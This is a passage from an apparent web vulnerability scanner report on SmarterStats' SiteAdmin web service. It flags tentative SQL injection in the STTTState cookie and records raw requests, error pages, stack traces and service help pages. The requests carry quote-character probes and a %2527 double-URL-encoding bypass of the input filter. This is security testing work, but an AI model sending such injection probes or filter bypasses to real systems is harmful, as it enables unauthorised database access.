&lt;DeleteSiteByNameResult&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/DeleteSiteByNameResult&gt;
&lt;/DeleteSiteByNameResponse&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>
</span>

<span>
<h3>HTTP GET</h3>
<p>The following is a sample HTTP GET request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>GET /Services/SiteAdmin.asmx/DeleteSiteByName?<font class=key>authUserName</font>=<font class=value>string</font>&amp;<font class=key>authPassword</font>=<font class=value>string</font>&amp;<font class=key>SiteName</font>=<font class=value>string</font>&amp;<font class=key>DeleteFiles</font>=<font class=value>string</font> HTTP/1.1
Host: localhost
</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;GenericResult xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/GenericResult&gt;</pre>
</span>

<span>
<h3>HTTP POST</h3>
<p>The following is a sample HTTP POST request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx/DeleteSiteByName HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: <font class=value>length</font>

<font class=key>authUserName</font>=<font class=value>string</font>&amp;<font class=key>authPassword</font>=<font class=value>string</font>&amp;<font class=key>SiteName</font>=<font class=value>string</font>&amp;<font class=key>DeleteFiles</font>=<font class=value>string</font></pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;GenericResult xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/GenericResult&gt;</pre>
</span>

</span>









</body>
</html>

2.12. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [STTTState cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Services/SiteAdmin.asmx

Issue detail

The STTTState cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the STTTState cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the STTTState cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /Services/SiteAdmin.asmx?op=GetRequestedSettings HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=; STTTState=%2527; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response 1

HTTP/2.0 500 Internal Server Error
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 07:01:45 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7512
Connection: Close

<html>
<head>
<title>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.Xml.Schema.XmlSchemaException: Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

The source code that generated this unhandled exception can only be shown when compiled in debug mode. To enable this, please follow one of the below steps, then request the URL:<br><br>1. Add a &quot;Debug=true&quot; directive at the top of the file that generated the error. Example:<br><br> &nbsp;&nbsp;&lt;%@ Page Language=&quot;C#&quot; Debug=&quot;true&quot; %&gt;<br><br>or:<br><br>2) Add the following section to the configuration file of your application:<br><br>&lt;configuration&gt;<br> &nbsp;&nbsp;&nbsp;&lt;system.web&gt;<br> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;compilation debug=&quot;true&quot;/&gt;<br> &nbsp;&nbsp;&nbsp;&lt;/system.web&gt;<br>&lt;/configuration&gt;<br><br> Note that this second technique will cause all files within a given application to be compiled in debug mode. The first technique will cause only that particular file to be compiled in debug mode.<br><br>Important: Running applications in debug mode does incur a memory/performance overhead. You should make sure that an application has debugging disabled before deploying into production scenario.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[XmlSchemaException: Undefined complexType &#39;http://schemas.xmlsoap.org/soap/encoding/:Array&#39; is used as a base for complex type restriction.]
System.Xml.Schema.XmlSchemaSet.InternalValidationCallback(Object sender, ValidationEventArgs e) +26
System.Xml.Schema.Compiler.CompileComplexType(XmlSchemaComplexType complexType) +540
System.Xml.Schema.Compiler.Compile() +772
System.Xml.Schema.XmlSchemaSet.Compile() +742
System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile) +1109
System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas) +204
System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +190
System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +75
ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e) +2222
System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +25
System.Web.UI.Control.LoadRecursive() +95
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +2760
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.1

</font>

</body>
</html>
<!--
[XmlSchemaException]: Undefined complexType &#39;http://schemas.xmlsoap.org/soap/encoding/:Array&#39; is used as a base for complex type restriction.
at System.Xml.Schema.XmlSchemaSet.InternalValidationCallback(Object sender, ValidationEventArgs e)
at System.Xml.Schema.Compiler.CompileComplexType(XmlSchemaComplexType complexType)
at System.Xml.Schema.Compiler.Compile()
at System.Xml.Schema.XmlSchemaSet.Compile()
at System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile)
at System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas)
at System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e)
at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
[HttpUnhandledException]: Exception of type &#39;System.Web.HttpUnhandledException&#39; was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at System.Web.Services.Protocols.DocumentationServerProtocol.WriteReturns(Object[] returnValues, Stream outputStream)
[InvalidOperationException]: The XML Web service help page encountered an internal error.
at System.Web.Services.Protocols.WebServiceHandler.WriteException(Exception e)
at System.Web.Services.Protocols.WebServiceHandler.CoreProcessRequest()
at System.Web.Services.Protocols.SyncSessionlessHandler.ProcessRequest(HttpContext context)
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
-->

Request 2

GET /Services/SiteAdmin.asmx?op=GetRequestedSettings HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=; STTTState=%2527%2527; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response 2

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 07:01:45 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Content-Length: 7722
Connection: Close



<html>

<head><link rel="alternate" type="text/xml" href="/Services/SiteAdmin.asmx?disco" />

<style type="text/css">

       BODY { color: #000000; background-color: white; font-family: Verdana; margin-left: 0px; margin-top: 0px; }
       #content { margin-left: 30px; font-size: .70em; padding-bottom: 2em; }
       A:link { color: #336699; font-weight: bold; text-decoration: underline; }
       A:visited { color: #6699cc; font-weight: bold; text-decoration: underline; }
       A:active { color: #336699; font-weight: bold; text-decoration: underline; }
       A:hover { color: cc3300; font-weight: bold; text-decoration: underline; }
       P { color: #000000; margin-top: 0px; margin-bottom: 12px; font-family: Verdana; }
       pre { background-color: #e5e5cc; padding: 5px; font-family: Courier New; font-size: x-small; margin-top: -5px; border: 1px #f0f0e0 solid; }
       td { color: #000000; font-family: Verdana; font-size: .7em; }
       h2 { font-size: 1.5em; font-weight: bold; margin-top: 25px; margin-bottom: 10px; border-top: 1px solid #003366; margin-left: -15px; color: #003366; }
       h3 { font-size: 1.1em; color: #000000; margin-left: -15px; margin-top: 10px; margin-bottom: 10px; }
       ul { margin-top: 10px; margin-left: 20px; }
       ol { margin-top: 10px; margin-left: 20px; }
       li { margin-top: 10px; color: #000000; }
       font.value { color: darkblue; font: bold; }
       font.key { color: darkgreen; font: bold; }
       font.error { color: darkred; font: bold; }
       .heading1 { color: #ffffff; font-family: Tahoma; font-size: 26px; font-weight: normal; background-color: #003366; margin-top: 0px; margin-bottom: 0px; margin-left: -30px; padding-top: 10px; padding-bottom: 3px; padding-left: 15px; width: 105%; }
       .button { background-color: #dcdcdc; font-family: Verdana; font-size: 1em; border-top: #cccccc 1px solid; border-bottom: #666666 1px solid; border-left: #cccccc 1px solid; border-right: #666666 1px solid; }
       .frmheader { color: #000000; background: #dcdcdc; font-family: Verdana; font-size: .7em; font-weight: normal; border-bottom: 1px solid #dcdcdc; padding-top: 2px; padding-bottom: 2px; }
       .frmtext { font-family: Verdana; font-size: .7em; margin-top: 8px; margin-bottom: 0px; margin-left: 32px; }
       .frmInput { font-family: Verdana; font-size: 1em; }
       .intro { margin-left: -15px; }

</style>

<title>
   SiteAdmin Web Service
</title></head>

<body>

<div id="content">

<p class="heading1">SiteAdmin</p><br>





<span>
<p class="intro">Click <a href="SiteAdmin.asmx">here</a> for a complete list of operations.</p>
<h2>GetRequestedSettings</h2>
<p class="intro">Gets the requested settings for a site</p>

<h3>Test</h3>

The test form is only available for methods with primitive types as parameters.
<span>
<h3>SOAP 1.1</h3>
<p>The following is a sample SOAP 1.1 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>
SOAPAction: "http://www.smartertools.com/smarterstats/SiteAdmin.asmx/GetRequestedSettings"

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;GetRequestedSettings xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;keys&gt;
&lt;string&gt;<font class=value>string</font>&lt;/string&gt;
&lt;string&gt;<font class=value>string</font>&lt;/string&gt;
&lt;/keys&gt;
&lt;/GetRequestedSettings&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;GetRequestedSettingsResponse xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;GetRequestedSettingsResult&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/GetRequestedSettingsResult&gt;
&lt;values&gt;
&lt;string&gt;<font class=value>string</font>&lt;/string&gt;
&lt;string&gt;<font class=value>string</font>&lt;/string&gt;
&lt;/values&gt;
&lt;/GetRequestedSettingsResponse&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>
</span>

<span>
<h3>SOAP 1.2</h3>
<p>The following is a sample SOAP 1.2 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;GetRequestedSettings xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;keys&gt;
&lt;string&gt;<font class=value>string</font>&lt;/string&gt;
&lt;string&gt;<font class=value>string</font>&lt;/string&gt;
&lt;/keys&gt;
&lt;/GetRequestedSettings&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;GetRequestedSettingsResponse xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;GetRequestedSettingsResult&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/GetRequestedSettingsResult&gt;
&lt;values&gt;
&lt;string&gt;<font class=value>string</font>&lt;/string&gt;
&lt;string&gt;<font class=value>string</font>&lt;/string&gt;
&lt;/values&gt;
&lt;/GetRequestedSettingsResponse&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>
</span>





</span>









</body>
</html>

2.13. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [STTTState cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Services/SiteAdmin.asmx

Issue detail

The STTTState cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the STTTState cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /Services/SiteAdmin.asmx?op=AddSite2 HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=; STTTState='; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response 1

HTTP/2.0 500 Internal Server Error
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 07:01:22 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7512
Connection: Close

<html>
<head>
<title>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.Xml.Schema.XmlSchemaException: Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

The source code that generated this unhandled exception can only be shown when compiled in debug mode. To enable this, please follow one of the below steps, then request the URL:<br><br>1. Add a &quot;Debug=true&quot; directive at the top of the file that generated the error. Example:<br><br> &nbsp;&nbsp;&lt;%@ Page Language=&quot;C#&quot; Debug=&quot;true&quot; %&gt;<br><br>or:<br><br>2) Add the following section to the configuration file of your application:<br><br>&lt;configuration&gt;<br> &nbsp;&nbsp;&nbsp;&lt;system.web&gt;<br> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;compilation debug=&quot;true&quot;/&gt;<br> &nbsp;&nbsp;&nbsp;&lt;/system.web&gt;<br>&lt;/configuration&gt;<br><br> Note that this second technique will cause all files within a given application to be compiled in debug mode. The first technique will cause only that particular file to be compiled in debug mode.<br><br>Important: Running applications in debug mode does incur a memory/performance overhead. You should make sure that an application has debugging disabled before deploying into production scenario.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[XmlSchemaException: Undefined complexType &#39;http://schemas.xmlsoap.org/soap/encoding/:Array&#39; is used as a base for complex type restriction.]
System.Xml.Schema.XmlSchemaSet.InternalValidationCallback(Object sender, ValidationEventArgs e) +26
System.Xml.Schema.Compiler.CompileComplexType(XmlSchemaComplexType complexType) +540
System.Xml.Schema.Compiler.Compile() +772
System.Xml.Schema.XmlSchemaSet.Compile() +742
System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile) +1109
System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas) +204
System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +190
System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +75
ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e) +2222
System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +25
System.Web.UI.Control.LoadRecursive() +95
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +2760
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.1

</font>

</body>
</html>
<!--
[XmlSchemaException]: Undefined complexType &#39;http://schemas.xmlsoap.org/soap/encoding/:Array&#39; is used as a base for complex type restriction.
at System.Xml.Schema.XmlSchemaSet.InternalValidationCallback(Object sender, ValidationEventArgs e)
at System.Xml.Schema.Compiler.CompileComplexType(XmlSchemaComplexType complexType)
at System.Xml.Schema.Compiler.Compile()
at System.Xml.Schema.XmlSchemaSet.Compile()
at System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile)
at System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas)
at System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e)
at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
[HttpUnhandledException]: Exception of type &#39;System.Web.HttpUnhandledException&#39; was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at System.Web.Services.Protocols.DocumentationServerProtocol.WriteReturns(Object[] returnValues, Stream outputStream)
[InvalidOperationException]: The XML Web service help page encountered an internal error.
at System.Web.Services.Protocols.WebServiceHandler.WriteException(Exception e)
at System.Web.Services.Protocols.WebServiceHandler.CoreProcessRequest()
at System.Web.Services.Protocols.SyncSessionlessHandler.ProcessRequest(HttpContext context)
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
-->

Request 2

GET /Services/SiteAdmin.asmx?op=AddSite2 HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=; STTTState=''; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response 2

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 07:01:22 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Content-Length: 19972
Connection: Close



<html>

<head><link rel="alternate" type="text/xml" href="/Services/SiteAdmin.asmx?disco" />

<style type="text/css">

       BODY { color: #000000; background-color: white; font-family: Verdana; margin-left: 0px; margin-top: 0px; }
       #content { margin-left: 30px; font-size: .70em; padding-bottom: 2em; }
       A:link { color: #336699; font-weight: bold; text-decoration: underline; }
       A:visited { color: #6699cc; font-weight: bold; text-decoration: underline; }
       A:active { color: #336699; font-weight: bold; text-decoration: underline; }
       A:hover { color: cc3300; font-weight: bold; text-decoration: underline; }
       P { color: #000000; margin-top: 0px; margin-bottom: 12px; font-family: Verdana; }
       pre { background-color: #e5e5cc; padding: 5px; font-family: Courier New; font-size: x-small; margin-top: -5px; border: 1px #f0f0e0 solid; }
       td { color: #000000; font-family: Verdana; font-size: .7em; }
       h2 { font-size: 1.5em; font-weight: bold; margin-top: 25px; margin-bottom: 10px; border-top: 1px solid #003366; margin-left: -15px; color: #003366; }
       h3 { font-size: 1.1em; color: #000000; margin-left: -15px; margin-top: 10px; margin-bottom: 10px; }
       ul { margin-top: 10px; margin-left: 20px; }
       ol { margin-top: 10px; margin-left: 20px; }
       li { margin-top: 10px; color: #000000; }
       font.value { color: darkblue; font: bold; }
       font.key { color: darkgreen; font: bold; }
       font.error { color: darkred; font: bold; }
       .heading1 { color: #ffffff; font-family: Tahoma; font-size: 26px; font-weight: normal; background-color: #003366; margin-top: 0px; margin-bottom: 0px; margin-left: -30px; padding-top: 10px; padding-bottom: 3px; padding-left: 15px; width: 105%; }
       .button { background-color: #dcdcdc; font-family: Verdana; font-size: 1em; border-top: #cccccc 1px solid; border-bottom: #666666 1px solid; border-left: #cccccc 1px solid; border-right: #666666 1px solid; }
       .frmheader { color: #000000; background: #dcdcdc; font-family: Verdana; font-size: .7em; font-weight: normal; border-bottom: 1px solid #dcdcdc; padding-top: 2px; padding-bottom: 2px; }
       .frmtext { font-family: Verdana; font-size: .7em; margin-top: 8px; margin-bottom: 0px; margin-left: 32px; }
       .frmInput { font-family: Verdana; font-size: 1em; }
       .intro { margin-left: -15px; }

</style>

<title>
   SiteAdmin Web Service
</title></head>

<body>

<div id="content">

<p class="heading1">SiteAdmin</p><br>





<span>
<p class="intro">Click <a href="SiteAdmin.asmx">here</a> for a complete list of operations.</p>
<h2>AddSite2</h2>
<p class="intro">Adds a site to the MRS.</p>

<h3>Test</h3>

To test the operation using the HTTP POST protocol, click the 'Invoke' button.



<form target="_blank" action='http://localhost:9999/Services/SiteAdmin.asmx/AddSite2' method="POST">

<table cellspacing="0" cellpadding="4" frame="box" bordercolor="#dcdcdc" rules="none" style="border-collapse: collapse;">
<tr>
   <td class="frmHeader" background="#dcdcdc" style="border-right: 2px solid white;">Parameter</td>
   <td class="frmHeader" background="#dcdcdc">Value</td>
</tr>


<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">authUserName:</td>
<td><input class="frmInput" type="text" size="50" name="authUserName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">authPassword:</td>
<td><input class="frmInput" type="text" size="50" name="authPassword"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">soUserName:</td>
<td><input class="frmInput" type="text" size="50" name="soUserName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">soPassword:</td>
<td><input class="frmInput" type="text" size="50" name="soPassword"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">soFirstName:</td>
